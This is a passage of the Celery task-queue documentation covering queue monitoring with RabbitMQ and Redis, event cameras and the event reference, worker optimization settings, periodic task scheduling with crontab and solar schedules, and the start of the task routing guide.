note:: The default virtual host (``"/"``) is used in these examples, if you use a custom virtual host you have to add the ``-p`` argument to the command, for example: ``rabbitmqctl list_queues -p my_vhost …`` .. _`rabbitmqctl(1)`: http://www.rabbitmq.com/man/rabbitmqctl.1.man.html .. _monitoring-rmq-queues: Inspecting queues ----------------- Finding the number of tasks in a queue: .. code-block:: console $ rabbitmqctl list_queues name messages messages_ready \ messages_unacknowledged Here `messages_ready` is the number of messages ready for delivery (sent but not received), `messages_unacknowledged` is the number of messages that's been received by a worker but not acknowledged yet (meaning it is in progress, or has been reserved). `messages` is the sum of ready and unacknowledged messages. Finding the number of workers currently consuming from a queue: .. code-block:: console $ rabbitmqctl list_queues name consumers Finding the amount of memory allocated to a queue: .. code-block:: console $ rabbitmqctl list_queues name memory :Tip: Adding the ``-q`` option to `rabbitmqctl(1)`_ makes the output easier to parse. .. _monitoring-redis: Redis ===== If you're using Redis as the broker, you can monitor the Celery cluster using the `redis-cli(1)` command to list lengths of queues. .. _monitoring-redis-queues: Inspecting queues ----------------- Finding the number of tasks in a queue: .. code-block:: console $ redis-cli -h HOST -p PORT -n DATABASE_NUMBER llen QUEUE_NAME The default queue is named `celery`. To get all available queues, invoke: .. code-block:: console $ redis-cli -h HOST -p PORT -n DATABASE_NUMBER keys \* .. note:: Queue keys only exists when there are tasks in them, so if a key doesn't exist it simply means there are no messages in that queue. This is because in Redis a list with no elements in it is automatically removed, and hence it won't show up in the `keys` command output, and `llen` for that list returns 0. Also, if you're using Redis for other purposes, the output of the `keys` command will include unrelated values stored in the database. The recommended way around this is to use a dedicated `DATABASE_NUMBER` for Celery, you can also use database numbers to separate Celery applications from each other (virtual hosts), but this won't affect the monitoring events used by for example Flower as Redis pub/sub commands are global rather than database based. .. _monitoring-munin: Munin ===== This is a list of known Munin plug-ins that can be useful when maintaining a Celery cluster. * ``rabbitmq-munin``: Munin plug-ins for RabbitMQ. https://github.com/ask/rabbitmq-munin * ``celery_tasks``: Monitors the number of times each task type has been executed (requires `celerymon`). https://github.com/munin-monitoring/contrib/blob/master/plugins/celery/celery_tasks * ``celery_tasks_states``: Monitors the number of tasks in each state (requires `celerymon`). https://github.com/munin-monitoring/contrib/blob/master/plugins/celery/celery_tasks_states .. _monitoring-events: Events ====== The worker has the ability to send a message whenever some event happens. These events are then captured by tools like Flower, and :program:`celery events` to monitor the cluster. .. _monitoring-snapshots: Snapshots --------- .. versionadded:: 2.1 Even a single worker can produce a huge amount of events, so storing the history of all events on disk may be very expensive. 
A sequence of events describes the cluster state in that time period, by taking periodic snapshots of this state you can keep all history, but still only periodically write it to disk. To take snapshots you need a Camera class, with this you can define what should happen every time the state is captured; You can write it to a database, send it by email or something else entirely. :program:`celery events` is then used to take snapshots with the camera, for example if you want to capture state every 2 seconds using the camera ``myapp.Camera`` you run :program:`celery events` with the following arguments: .. code-block:: console $ celery -A proj events -c myapp.Camera --frequency=2.0 .. _monitoring-camera: Custom Camera ~~~~~~~~~~~~~ Cameras can be useful if you need to capture events and do something with those events at an interval. For real-time event processing you should use :class:`@events.Receiver` directly, like in :ref:`event-real-time-example`. Here is an example camera, dumping the snapshot to screen: .. code-block:: python from pprint import pformat from celery.events.snapshot import Polaroid class DumpCam(Polaroid): clear_after = True # clear after flush (incl, state.event_count). def on_shutter(self, state): if not state.event_count: # No new events since last snapshot. return print('Workers: {0}'.format(pformat(state.workers, indent=4))) print('Tasks: {0}'.format(pformat(state.tasks, indent=4))) print('Total: {0.event_count} events, {0.task_count} tasks'.format( state)) See the API reference for :mod:`celery.events.state` to read more about state objects. Now you can use this cam with :program:`celery events` by specifying it with the :option:`-c ` option: .. code-block:: console $ celery -A proj events -c myapp.DumpCam --frequency=2.0 Or you can use it programmatically like this: .. code-block:: python from celery import Celery from myapp import DumpCam def main(app, freq=1.0): state = app.events.State() with app.connection() as connection: recv = app.events.Receiver(connection, handlers={'*': state.event}) with DumpCam(state, freq=freq): recv.capture(limit=None, timeout=None) if __name__ == '__main__': app = Celery(broker='amqp://guest@localhost//') main(app) .. _event-real-time-example: Real-time processing -------------------- To process events in real-time you need the following - An event consumer (this is the ``Receiver``) - A set of handlers called when events come in. You can have different handlers for each event type, or a catch-all handler can be used ('*') - State (optional) :class:`@events.State` is a convenient in-memory representation of tasks and workers in the cluster that's updated as events come in. It encapsulates solutions for many common things, like checking if a worker is still alive (by verifying heartbeats), merging event fields together as events come in, making sure time-stamps are in sync, and so on. Combining these you can easily process events in real-time: .. code-block:: python from celery import Celery def my_monitor(app): state = app.events.State() def announce_failed_tasks(event): state.event(event) # task name is sent only with -received event, and state # will keep track of this for us. 
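# state.tasks maps task ids to the Task objects kept in memory by events.State.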
task = state.tasks.get(event['uuid']) print('TASK FAILED: %s[%s] %s' % ( task.name, task.uuid, task.info(),)) with app.connection() as connection: recv = app.events.Receiver(connection, handlers={ 'task-failed': announce_failed_tasks, '*': state.event, }) recv.capture(limit=None, timeout=None, wakeup=True) if __name__ == '__main__': app = Celery(broker='amqp://guest@localhost//') my_monitor(app) .. note:: The ``wakeup`` argument to ``capture`` sends a signal to all workers to force them to send a heartbeat. This way you can immediately see workers when the monitor starts. You can listen to specific events by specifying the handlers: .. code-block:: python from celery import Celery def my_monitor(app): state = app.events.State() def announce_failed_tasks(event): state.event(event) # task name is sent only with -received event, and state # will keep track of this for us. task = state.tasks.get(event['uuid']) print('TASK FAILED: %s[%s] %s' % ( task.name, task.uuid, task.info(),)) with app.connection() as connection: recv = app.events.Receiver(connection, handlers={ 'task-failed': announce_failed_tasks, }) recv.capture(limit=None, timeout=None, wakeup=True) if __name__ == '__main__': app = Celery(broker='amqp://guest@localhost//') my_monitor(app) .. _event-reference: Event Reference =============== This list contains the events sent by the worker, and their arguments. .. _event-reference-task: Task Events ----------- .. event:: task-sent task-sent ~~~~~~~~~ :signature: ``task-sent(uuid, name, args, kwargs, retries, eta, expires, queue, exchange, routing_key, root_id, parent_id)`` Sent when a task message is published and the :setting:`task_send_sent_event` setting is enabled. .. event:: task-received task-received ~~~~~~~~~~~~~ :signature: ``task-received(uuid, name, args, kwargs, retries, eta, hostname, timestamp, root_id, parent_id)`` Sent when the worker receives a task. .. event:: task-started task-started ~~~~~~~~~~~~ :signature: ``task-started(uuid, hostname, timestamp, pid)`` Sent just before the worker executes the task. .. event:: task-succeeded task-succeeded ~~~~~~~~~~~~~~ :signature: ``task-succeeded(uuid, result, runtime, hostname, timestamp)`` Sent if the task executed successfully. Run-time is the time it took to execute the task using the pool. (Starting from the task is sent to the worker pool, and ending when the pool result handler callback is called). .. event:: task-failed task-failed ~~~~~~~~~~~ :signature: ``task-failed(uuid, exception, traceback, hostname, timestamp)`` Sent if the execution of the task failed. .. event:: task-rejected task-rejected ~~~~~~~~~~~~~ :signature: ``task-rejected(uuid, requeued)`` The task was rejected by the worker, possibly to be re-queued or moved to a dead letter queue. .. event:: task-revoked task-revoked ~~~~~~~~~~~~ :signature: ``task-revoked(uuid, terminated, signum, expired)`` Sent if the task has been revoked (Note that this is likely to be sent by more than one worker). - ``terminated`` is set to true if the task process was terminated, and the ``signum`` field set to the signal used. - ``expired`` is set to true if the task expired. .. event:: task-retried task-retried ~~~~~~~~~~~~ :signature: ``task-retried(uuid, exception, traceback, hostname, timestamp)`` Sent if the task failed, but will be retried in the future. .. _event-reference-worker: Worker Events ------------- .. 
event:: worker-online worker-online ~~~~~~~~~~~~~ :signature: ``worker-online(hostname, timestamp, freq, sw_ident, sw_ver, sw_sys)`` The worker has connected to the broker and is online. - `hostname`: Nodename of the worker. - `timestamp`: Event time-stamp. - `freq`: Heartbeat frequency in seconds (float). - `sw_ident`: Name of worker software (e.g., ``py-celery``). - `sw_ver`: Software version (e.g., 2.2.0). - `sw_sys`: Operating System (e.g., Linux/Darwin). .. event:: worker-heartbeat worker-heartbeat ~~~~~~~~~~~~~~~~ :signature: ``worker-heartbeat(hostname, timestamp, freq, sw_ident, sw_ver, sw_sys, active, processed)`` Sent every minute, if the worker hasn't sent a heartbeat in 2 minutes, it is considered to be offline. - `hostname`: Nodename of the worker. - `timestamp`: Event time-stamp. - `freq`: Heartbeat frequency in seconds (float). - `sw_ident`: Name of worker software (e.g., ``py-celery``). - `sw_ver`: Software version (e.g., 2.2.0). - `sw_sys`: Operating System (e.g., Linux/Darwin). - `active`: Number of currently executing tasks. - `processed`: Total number of tasks processed by this worker. .. event:: worker-offline worker-offline ~~~~~~~~~~~~~~ :signature: ``worker-offline(hostname, timestamp, freq, sw_ident, sw_ver, sw_sys)`` The worker has disconnected from the broker. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/docs/userguide/optimizing.rst0000664000175000017500000002036500000000000020552 0ustar00asifasif00000000000000.. _guide-optimizing: ============ Optimizing ============ Introduction ============ The default configuration makes a lot of compromises. It's not optimal for any single case, but works well enough for most situations. There are optimizations that can be applied based on specific use cases. Optimizations can apply to different properties of the running environment, be it the time tasks take to execute, the amount of memory used, or responsiveness at times of high load. Ensuring Operations =================== In the book `Programming Pearls`_, Jon Bentley presents the concept of back-of-the-envelope calculations by asking the question; ❝ How much water flows out of the Mississippi River in a day? ❞ The point of this exercise [*]_ is to show that there's a limit to how much data a system can process in a timely manner. Back of the envelope calculations can be used as a means to plan for this ahead of time. In Celery; If a task takes 10 minutes to complete, and there are 10 new tasks coming in every minute, the queue will never be empty. This is why it's very important that you monitor queue lengths! A way to do this is by :ref:`using Munin `. You should set up alerts, that'll notify you as soon as any queue has reached an unacceptable size. This way you can take appropriate action like adding new worker nodes, or revoking unnecessary tasks. .. _`Programming Pearls`: http://www.cs.bell-labs.com/cm/cs/pearls/ .. _`The back of the envelope`: http://books.google.com/books?id=kse_7qbWbjsC&pg=PA67 .. _optimizing-general-settings: General Settings ================ .. _optimizing-connection-pools: Broker Connection Pools ----------------------- The broker connection pool is enabled by default since version 2.5. You can tweak the :setting:`broker_pool_limit` setting to minimize contention, and the value should be based on the number of active threads/green-threads using broker connections. .. 
_optimizing-transient-queues: Using Transient Queues ---------------------- Queues created by Celery are persistent by default. This means that the broker will write messages to disk to ensure that the tasks will be executed even if the broker is restarted. But in some cases it's fine that the message is lost, so not all tasks require durability. You can create a *transient* queue for these tasks to improve performance: .. code-block:: python from kombu import Exchange, Queue task_queues = ( Queue('celery', routing_key='celery'), Queue('transient', Exchange('transient', delivery_mode=1), routing_key='transient', durable=False), ) or by using :setting:`task_routes`: .. code-block:: python task_routes = { 'proj.tasks.add': {'queue': 'celery', 'delivery_mode': 'transient'} } The ``delivery_mode`` changes how the messages to this queue are delivered. A value of one means that the message won't be written to disk, and a value of two (default) means that the message can be written to disk. To direct a task to your new transient queue you can specify the queue argument (or use the :setting:`task_routes` setting): .. code-block:: python task.apply_async(args, queue='transient') For more information see the :ref:`routing guide `. .. _optimizing-worker-settings: Worker Settings =============== .. _optimizing-prefetch-limit: Prefetch Limits --------------- *Prefetch* is a term inherited from AMQP that's often misunderstood by users. The prefetch limit is a **limit** for the number of tasks (messages) a worker can reserve for itself. If it is zero, the worker will keep consuming messages, not respecting that there may be other available worker nodes that may be able to process them sooner [*]_, or that the messages may not even fit in memory. The workers' default prefetch count is the :setting:`worker_prefetch_multiplier` setting multiplied by the number of concurrency slots [*]_ (processes/threads/green-threads). If you have many tasks with a long duration you want the multiplier value to be *one*: meaning it'll only reserve one task per worker process at a time. However -- If you have many short-running tasks, and throughput/round trip latency is important to you, this number should be large. The worker is able to process more tasks per second if the messages have already been prefetched, and is available in memory. You may have to experiment to find the best value that works for you. Values like 50 or 150 might make sense in these circumstances. Say 64, or 128. If you have a combination of long- and short-running tasks, the best option is to use two worker nodes that are configured separately, and route the tasks according to the run-time (see :ref:`guide-routing`). Reserve one task at a time -------------------------- The task message is only deleted from the queue after the task is :term:`acknowledged`, so if the worker crashes before acknowledging the task, it can be redelivered to another worker (or the same after recovery). When using the default of early acknowledgment, having a prefetch multiplier setting of *one*, means the worker will reserve at most one extra task for every worker process: or in other words, if the worker is started with :option:`-c 10 `, the worker may reserve at most 20 tasks (10 acknowledged tasks executing, and 10 unacknowledged reserved tasks) at any time. 
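To make this arithmetic explicit, the upper bound can be sketched as a
small helper (a hypothetical function for illustration only, not part
of Celery):

.. code-block:: python

    def reserved_message_bound(concurrency, prefetch_multiplier,
                               acks_late=False):
        """Rough upper bound on task messages a worker holds at once.

        With early acknowledgment (the default) the executing tasks are
        already acknowledged, so the prefetched, unacknowledged messages
        come on top of them; with late acknowledgment the executing
        tasks count toward the prefetch limit themselves.
        """
        prefetched = concurrency * prefetch_multiplier
        return prefetched if acks_late else concurrency + prefetched

    reserved_message_bound(10, 1)                  # 20, as described above
    reserved_message_bound(10, 1, acks_late=True)  # 10, see below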
Often users ask if disabling "prefetching of tasks" is possible, but what they really mean by that, is to have a worker only reserve as many tasks as there are worker processes (10 unacknowledged tasks for :option:`-c 10 `) That's possible, but not without also enabling :term:`late acknowledgment`. Using this option over the default behavior means a task that's already started executing will be retried in the event of a power failure or the worker instance being killed abruptly, so this also means the task must be :term:`idempotent` .. seealso:: Notes at :ref:`faq-acks_late-vs-retry`. You can enable this behavior by using the following configuration options: .. code-block:: python task_acks_late = True worker_prefetch_multiplier = 1 Memory Usage ------------ If you are experiencing high memory usage on a prefork worker, first you need to determine whether the issue is also happening on the Celery master process. The Celery master process's memory usage should not continue to increase drastically after start-up. If you see this happening, it may indicate a memory leak bug which should be reported to the Celery issue tracker. If only your child processes have high memory usage, this indicates an issue with your task. Keep in mind, Python process memory usage has a "high watermark" and will not return memory to the operating system until the child process has stopped. This means a single high memory usage task could permanently increase the memory usage of a child process until it's restarted. Fixing this may require adding chunking logic to your task to reduce peak memory usage. Celery workers have two main ways to help reduce memory usage due to the "high watermark" and/or memory leaks in child processes: the :setting:`worker_max_tasks_per_child` and :setting:`worker_max_memory_per_child` settings. You must be careful not to set these settings too low, or else your workers will spend most of their time restarting child processes instead of processing tasks. For example, if you use a :setting:`worker_max_tasks_per_child` of 1 and your child process takes 1 second to start, then that child process would only be able to process a maximum of 60 tasks per minute (assuming the task ran instantly). A similar issue can occur when your tasks always exceed :setting:`worker_max_memory_per_child`. .. rubric:: Footnotes .. [*] The chapter is available to read for free here: `The back of the envelope`_. The book is a classic text. Highly recommended. .. [*] RabbitMQ and other brokers deliver messages round-robin, so this doesn't apply to an active system. If there's no prefetch limit and you restart the cluster, there will be timing delays between nodes starting. If there are 3 offline nodes and one active node, all messages will be delivered to the active node. .. [*] This is the concurrency setting; :setting:`worker_concurrency` or the :option:`celery worker -c` option. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/periodic-tasks.rst0000664000175000017500000004777300000000000021316 0ustar00asifasif00000000000000.. _guide-beat: ================ Periodic Tasks ================ .. contents:: :local: Introduction ============ :program:`celery beat` is a scheduler; It kicks off tasks at regular intervals, that are then executed by available worker nodes in the cluster. 
By default the entries are taken from the :setting:`beat_schedule` setting, but custom stores can also be used, like storing the entries in a SQL database. You have to ensure only a single scheduler is running for a schedule at a time, otherwise you'd end up with duplicate tasks. Using a centralized approach means the schedule doesn't have to be synchronized, and the service can operate without using locks. .. _beat-timezones: Time Zones ========== The periodic task schedules uses the UTC time zone by default, but you can change the time zone used using the :setting:`timezone` setting. An example time zone could be `Europe/London`: .. code-block:: python timezone = 'Europe/London' This setting must be added to your app, either by configuring it directly using (``app.conf.timezone = 'Europe/London'``), or by adding it to your configuration module if you have set one up using ``app.config_from_object``. See :ref:`celerytut-configuration` for more information about configuration options. The default scheduler (storing the schedule in the :file:`celerybeat-schedule` file) will automatically detect that the time zone has changed, and so will reset the schedule itself, but other schedulers may not be so smart (e.g., the Django database scheduler, see below) and in that case you'll have to reset the schedule manually. .. admonition:: Django Users Celery recommends and is compatible with the new ``USE_TZ`` setting introduced in Django 1.4. For Django users the time zone specified in the ``TIME_ZONE`` setting will be used, or you can specify a custom time zone for Celery alone by using the :setting:`timezone` setting. The database scheduler won't reset when timezone related settings change, so you must do this manually: .. code-block:: console $ python manage.py shell >>> from djcelery.models import PeriodicTask >>> PeriodicTask.objects.update(last_run_at=None) Django-Celery only supports Celery 4.0 and below, for Celery 4.0 and above, do as follow: .. code-block:: console $ python manage.py shell >>> from django_celery_beat.models import PeriodicTask >>> PeriodicTask.objects.update(last_run_at=None) .. _beat-entries: Entries ======= To call a task periodically you have to add an entry to the beat schedule list. .. code-block:: python from celery import Celery from celery.schedules import crontab app = Celery() @app.on_after_configure.connect def setup_periodic_tasks(sender, **kwargs): # Calls test('hello') every 10 seconds. sender.add_periodic_task(10.0, test.s('hello'), name='add every 10') # Calls test('world') every 30 seconds sender.add_periodic_task(30.0, test.s('world'), expires=10) # Executes every Monday morning at 7:30 a.m. sender.add_periodic_task( crontab(hour=7, minute=30, day_of_week=1), test.s('Happy Mondays!'), ) @app.task def test(arg): print(arg) @app.task def add(x, y): z = x + y print(z) Setting these up from within the :data:`~@on_after_configure` handler means that we'll not evaluate the app at module level when using ``test.s()``. Note that :data:`~@on_after_configure` is sent after the app is set up, so tasks outside the module where the app is declared (e.g. in a `tasks.py` file located by :meth:`celery.Celery.autodiscover_tasks`) must use a later signal, such as :data:`~@on_after_finalize`. The :meth:`~@add_periodic_task` function will add the entry to the :setting:`beat_schedule` setting behind the scenes, and the same setting can also be used to set up periodic tasks manually: Example: Run the `tasks.add` task every 30 seconds. .. 
code-block:: python app.conf.beat_schedule = { 'add-every-30-seconds': { 'task': 'tasks.add', 'schedule': 30.0, 'args': (16, 16) }, } app.conf.timezone = 'UTC' .. note:: If you're wondering where these settings should go then please see :ref:`celerytut-configuration`. You can either set these options on your app directly or you can keep a separate module for configuration. If you want to use a single item tuple for `args`, don't forget that the constructor is a comma, and not a pair of parentheses. Using a :class:`~datetime.timedelta` for the schedule means the task will be sent in 30 second intervals (the first task will be sent 30 seconds after `celery beat` starts, and then every 30 seconds after the last run). A Crontab like schedule also exists, see the section on `Crontab schedules`_. Like with :command:`cron`, the tasks may overlap if the first task doesn't complete before the next. If that's a concern you should use a locking strategy to ensure only one instance can run at a time (see for example :ref:`cookbook-task-serial`). .. _beat-entry-fields: Available Fields ---------------- * `task` The name of the task to execute. * `schedule` The frequency of execution. This can be the number of seconds as an integer, a :class:`~datetime.timedelta`, or a :class:`~celery.schedules.crontab`. You can also define your own custom schedule types, by extending the interface of :class:`~celery.schedules.schedule`. * `args` Positional arguments (:class:`list` or :class:`tuple`). * `kwargs` Keyword arguments (:class:`dict`). * `options` Execution options (:class:`dict`). This can be any argument supported by :meth:`~celery.app.task.Task.apply_async` -- `exchange`, `routing_key`, `expires`, and so on. * `relative` If `relative` is true :class:`~datetime.timedelta` schedules are scheduled "by the clock." This means the frequency is rounded to the nearest second, minute, hour or day depending on the period of the :class:`~datetime.timedelta`. By default `relative` is false, the frequency isn't rounded and will be relative to the time when :program:`celery beat` was started. .. _beat-crontab: Crontab schedules ================= If you want more control over when the task is executed, for example, a particular time of day or day of the week, you can use the :class:`~celery.schedules.crontab` schedule type: .. code-block:: python from celery.schedules import crontab app.conf.beat_schedule = { # Executes every Monday morning at 7:30 a.m. 'add-every-monday-morning': { 'task': 'tasks.add', 'schedule': crontab(hour=7, minute=30, day_of_week=1), 'args': (16, 16), }, } The syntax of these Crontab expressions are very flexible. Some examples: +-----------------------------------------+--------------------------------------------+ | **Example** | **Meaning** | +-----------------------------------------+--------------------------------------------+ | ``crontab()`` | Execute every minute. | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0, hour=0)`` | Execute daily at midnight. | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0, hour='*/3')`` | Execute every three hours: | | | midnight, 3am, 6am, 9am, | | | noon, 3pm, 6pm, 9pm. | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0,`` | Same as previous. 
| | ``hour='0,3,6,9,12,15,18,21')`` | | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute='*/15')`` | Execute every 15 minutes. | +-----------------------------------------+--------------------------------------------+ | ``crontab(day_of_week='sunday')`` | Execute every minute (!) at Sundays. | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute='*',`` | Same as previous. | | ``hour='*',`` | | | ``day_of_week='sun')`` | | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute='*/10',`` | Execute every ten minutes, but only | | ``hour='3,17,22',`` | between 3-4 am, 5-6 pm, and 10-11 pm on | | ``day_of_week='thu,fri')`` | Thursdays or Fridays. | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0, hour='*/2,*/3')`` | Execute every even hour, and every hour | | | divisible by three. This means: | | | at every hour *except*: 1am, | | | 5am, 7am, 11am, 1pm, 5pm, 7pm, | | | 11pm | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0, hour='*/5')`` | Execute hour divisible by 5. This means | | | that it is triggered at 3pm, not 5pm | | | (since 3pm equals the 24-hour clock | | | value of "15", which is divisible by 5). | +-----------------------------------------+--------------------------------------------+ | ``crontab(minute=0, hour='*/3,8-17')`` | Execute every hour divisible by 3, and | | | every hour during office hours (8am-5pm). | +-----------------------------------------+--------------------------------------------+ | ``crontab(0, 0, day_of_month='2')`` | Execute on the second day of every month. | | | | +-----------------------------------------+--------------------------------------------+ | ``crontab(0, 0,`` | Execute on every even numbered day. | | ``day_of_month='2-30/2')`` | | +-----------------------------------------+--------------------------------------------+ | ``crontab(0, 0,`` | Execute on the first and third weeks of | | ``day_of_month='1-7,15-21')`` | the month. | +-----------------------------------------+--------------------------------------------+ | ``crontab(0, 0, day_of_month='11',`` | Execute on the eleventh of May every year. | | ``month_of_year='5')`` | | +-----------------------------------------+--------------------------------------------+ | ``crontab(0, 0,`` | Execute every day on the first month | | ``month_of_year='*/3')`` | of every quarter. | +-----------------------------------------+--------------------------------------------+ See :class:`celery.schedules.crontab` for more documentation. .. _beat-solar: Solar schedules ================= If you have a task that should be executed according to sunrise, sunset, dawn or dusk, you can use the :class:`~celery.schedules.solar` schedule type: .. 
code-block:: python from celery.schedules import solar app.conf.beat_schedule = { # Executes at sunset in Melbourne 'add-at-melbourne-sunset': { 'task': 'tasks.add', 'schedule': solar('sunset', -37.81753, 144.96715), 'args': (16, 16), }, } The arguments are simply: ``solar(event, latitude, longitude)`` Be sure to use the correct sign for latitude and longitude: +---------------+-------------------+----------------------+ | **Sign** | **Argument** | **Meaning** | +---------------+-------------------+----------------------+ | ``+`` | ``latitude`` | North | +---------------+-------------------+----------------------+ | ``-`` | ``latitude`` | South | +---------------+-------------------+----------------------+ | ``+`` | ``longitude`` | East | +---------------+-------------------+----------------------+ | ``-`` | ``longitude`` | West | +---------------+-------------------+----------------------+ Possible event types are: +-----------------------------------------+--------------------------------------------+ | **Event** | **Meaning** | +-----------------------------------------+--------------------------------------------+ | ``dawn_astronomical`` | Execute at the moment after which the sky | | | is no longer completely dark. This is when | | | the sun is 18 degrees below the horizon. | +-----------------------------------------+--------------------------------------------+ | ``dawn_nautical`` | Execute when there's enough sunlight for | | | the horizon and some objects to be | | | distinguishable; formally, when the sun is | | | 12 degrees below the horizon. | +-----------------------------------------+--------------------------------------------+ | ``dawn_civil`` | Execute when there's enough light for | | | objects to be distinguishable so that | | | outdoor activities can commence; | | | formally, when the Sun is 6 degrees below | | | the horizon. | +-----------------------------------------+--------------------------------------------+ | ``sunrise`` | Execute when the upper edge of the sun | | | appears over the eastern horizon in the | | | morning. | +-----------------------------------------+--------------------------------------------+ | ``solar_noon`` | Execute when the sun is highest above the | | | horizon on that day. | +-----------------------------------------+--------------------------------------------+ | ``sunset`` | Execute when the trailing edge of the sun | | | disappears over the western horizon in the | | | evening. | +-----------------------------------------+--------------------------------------------+ | ``dusk_civil`` | Execute at the end of civil twilight, when | | | objects are still distinguishable and some | | | stars and planets are visible. Formally, | | | when the sun is 6 degrees below the | | | horizon. | +-----------------------------------------+--------------------------------------------+ | ``dusk_nautical`` | Execute when the sun is 12 degrees below | | | the horizon. Objects are no longer | | | distinguishable, and the horizon is no | | | longer visible to the naked eye. | +-----------------------------------------+--------------------------------------------+ | ``dusk_astronomical`` | Execute at the moment after which the sky | | | becomes completely dark; formally, when | | | the sun is 18 degrees below the horizon. | +-----------------------------------------+--------------------------------------------+ All solar events are calculated using UTC, and are therefore unaffected by your timezone setting. 
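As with the interval and Crontab entries shown earlier, a solar
schedule can also be registered from an :data:`~@on_after_configure`
handler.  A minimal sketch, reusing the ``add`` task and the Melbourne
coordinates from the examples above:

.. code-block:: python

    from celery.schedules import solar

    @app.on_after_configure.connect
    def setup_solar_tasks(sender, **kwargs):
        # Runs add(16, 16) at every sunset in Melbourne.
        sender.add_periodic_task(
            solar('sunset', -37.81753, 144.96715),
            add.s(16, 16),
        )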
In polar regions, the sun may not rise or set every day. The scheduler is able to handle these cases (i.e., a ``sunrise`` event won't run on a day when the sun doesn't rise). The one exception is ``solar_noon``, which is formally defined as the moment the sun transits the celestial meridian, and will occur every day even if the sun is below the horizon. Twilight is defined as the period between dawn and sunrise; and between sunset and dusk. You can schedule an event according to "twilight" depending on your definition of twilight (civil, nautical, or astronomical), and whether you want the event to take place at the beginning or end of twilight, using the appropriate event from the list above. See :class:`celery.schedules.solar` for more documentation. .. _beat-starting: Starting the Scheduler ====================== To start the :program:`celery beat` service: .. code-block:: console $ celery -A proj beat You can also embed `beat` inside the worker by enabling the workers :option:`-B ` option, this is convenient if you'll never run more than one worker node, but it's not commonly used and for that reason isn't recommended for production use: .. code-block:: console $ celery -A proj worker -B Beat needs to store the last run times of the tasks in a local database file (named `celerybeat-schedule` by default), so it needs access to write in the current directory, or alternatively you can specify a custom location for this file: .. code-block:: console $ celery -A proj beat -s /home/celery/var/run/celerybeat-schedule .. note:: To daemonize beat see :ref:`daemonizing`. .. _beat-custom-schedulers: Using custom scheduler classes ------------------------------ Custom scheduler classes can be specified on the command-line (the :option:`--scheduler ` argument). The default scheduler is the :class:`celery.beat.PersistentScheduler`, that simply keeps track of the last run times in a local :mod:`shelve` database file. There's also the :pypi:`django-celery-beat` extension that stores the schedule in the Django database, and presents a convenient admin interface to manage periodic tasks at runtime. To install and use this extension: #. Use :command:`pip` to install the package: .. code-block:: console $ pip install django-celery-beat #. Add the ``django_celery_beat`` module to ``INSTALLED_APPS`` in your Django project' :file:`settings.py`:: INSTALLED_APPS = ( ..., 'django_celery_beat', ) Note that there is no dash in the module name, only underscores. #. Apply Django database migrations so that the necessary tables are created: .. code-block:: console $ python manage.py migrate #. Start the :program:`celery beat` service using the ``django_celery_beat.schedulers:DatabaseScheduler`` scheduler: .. code-block:: console $ celery -A proj beat -l INFO --scheduler django_celery_beat.schedulers:DatabaseScheduler Note: You may also add this as the :setting:`beat_scheduler` setting directly. #. Visit the Django-Admin interface to set up some periodic tasks. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/routing.rst0000664000175000017500000005737400000000000020062 0ustar00asifasif00000000000000.. _guide-routing: =============== Routing Tasks =============== .. note:: Alternate routing concepts like topic and fanout is not available for all transports, please consult the :ref:`transport comparison table `. .. contents:: :local: .. _routing-basics: Basics ====== .. 
_routing-automatic: Automatic routing ----------------- The simplest way to do routing is to use the :setting:`task_create_missing_queues` setting (on by default). With this setting on, a named queue that's not already defined in :setting:`task_queues` will be created automatically. This makes it easy to perform simple routing tasks. Say you have two servers, `x`, and `y` that handle regular tasks, and one server `z`, that only handles feed related tasks. You can use this configuration:: task_routes = {'feed.tasks.import_feed': {'queue': 'feeds'}} With this route enabled import feed tasks will be routed to the `"feeds"` queue, while all other tasks will be routed to the default queue (named `"celery"` for historical reasons). Alternatively, you can use glob pattern matching, or even regular expressions, to match all tasks in the ``feed.tasks`` name-space: .. code-block:: python app.conf.task_routes = {'feed.tasks.*': {'queue': 'feeds'}} If the order of matching patterns is important you should specify the router in *items* format instead: .. code-block:: python task_routes = ([ ('feed.tasks.*', {'queue': 'feeds'}), ('web.tasks.*', {'queue': 'web'}), (re.compile(r'(video|image)\.tasks\..*'), {'queue': 'media'}), ],) .. note:: The :setting:`task_routes` setting can either be a dictionary, or a list of router objects, so in this case we need to specify the setting as a tuple containing a list. After installing the router, you can start server `z` to only process the feeds queue like this: .. code-block:: console user@z:/$ celery -A proj worker -Q feeds You can specify as many queues as you want, so you can make this server process the default queue as well: .. code-block:: console user@z:/$ celery -A proj worker -Q feeds,celery .. _routing-changing-default-queue: Changing the name of the default queue ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can change the name of the default queue by using the following configuration: .. code-block:: python app.conf.task_default_queue = 'default' .. _routing-autoqueue-details: How the queues are defined ~~~~~~~~~~~~~~~~~~~~~~~~~~ The point with this feature is to hide the complex AMQP protocol for users with only basic needs. However -- you may still be interested in how these queues are declared. A queue named `"video"` will be created with the following settings: .. code-block:: javascript {'exchange': 'video', 'exchange_type': 'direct', 'routing_key': 'video'} The non-AMQP backends like `Redis` or `SQS` don't support exchanges, so they require the exchange to have the same name as the queue. Using this design ensures it will work for them as well. .. _routing-manual: Manual routing -------------- Say you have two servers, `x`, and `y` that handle regular tasks, and one server `z`, that only handles feed related tasks, you can use this configuration: .. code-block:: python from kombu import Queue app.conf.task_default_queue = 'default' app.conf.task_queues = ( Queue('default', routing_key='task.#'), Queue('feed_tasks', routing_key='feed.#'), ) app.conf.task_default_exchange = 'tasks' app.conf.task_default_exchange_type = 'topic' app.conf.task_default_routing_key = 'task.default' :setting:`task_queues` is a list of :class:`~kombu.entity.Queue` instances. If you don't set the exchange or exchange type values for a key, these will be taken from the :setting:`task_default_exchange` and :setting:`task_default_exchange_type` settings. To route a task to the `feed_tasks` queue, you can add an entry in the :setting:`task_routes` 